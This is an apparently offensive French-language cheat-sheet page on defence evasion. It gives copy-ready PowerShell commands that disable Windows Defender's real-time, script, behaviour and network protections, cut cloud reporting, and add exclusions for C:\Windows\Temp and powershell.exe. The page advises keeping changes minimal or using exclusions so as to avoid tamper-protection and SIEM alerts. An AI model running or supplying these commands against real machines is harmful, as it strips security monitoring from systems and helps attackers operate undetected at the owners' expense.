Defense Evasion

Disable AV

Désactivation de Windows Defender via PowerShell. Requiert des droits admin.

Désactiver Defender (minimal)

Copy command

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

Description: Désactive la protection réseau (IPS), le scan des téléchargements (IOAV) et la protection temps réel. Nécessite des droits admin. Persistant jusqu'au prochain reboot ou réactivation manuelle.

Désactiver Defender (complet)

Copy command

Set-MpPreference -DisableIntrusionPreventionSystem $true `
                 -DisableIOAVProtection $true `
                 -DisableRealtimeMonitoring $true `
                 -DisableScriptScanning $true `
                 -DisableBehaviorMonitoring $true `
                 -DisableBlockAtFirstSeen $true `
                 -MAPSReporting Disabled `
                 -SubmitSamplesConsent NeverSend

Description: Désactive en plus le scan des scripts PowerShell, le monitoring comportemental, le blocage au premier contact, et la remontée MAPS/cloud. Réduire au minimum nécessaire pour éviter les alertes inutiles.

Vérifier l'état

Copy command

Get-MpComputerStatus | Select-Object -Property *Enabled*, *Disabled*

Description: Affiche toutes les propriétés Enabled/Disabled de Defender. Confirmer que les options ciblées sont bien désactivées.

Exclusions

Alternative moins bruyante à la désactivation complète

Copy command

# Ajouter une exclusion de chemin
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Ajouter une exclusion de processus
Add-MpPreference -ExclusionProcess "powershell.exe"

Description: Ajouter des exclusions ciblées plutôt que désactiver Defender entièrement. Moins susceptible de déclencher des alertes de type tamper protection ou SIEM.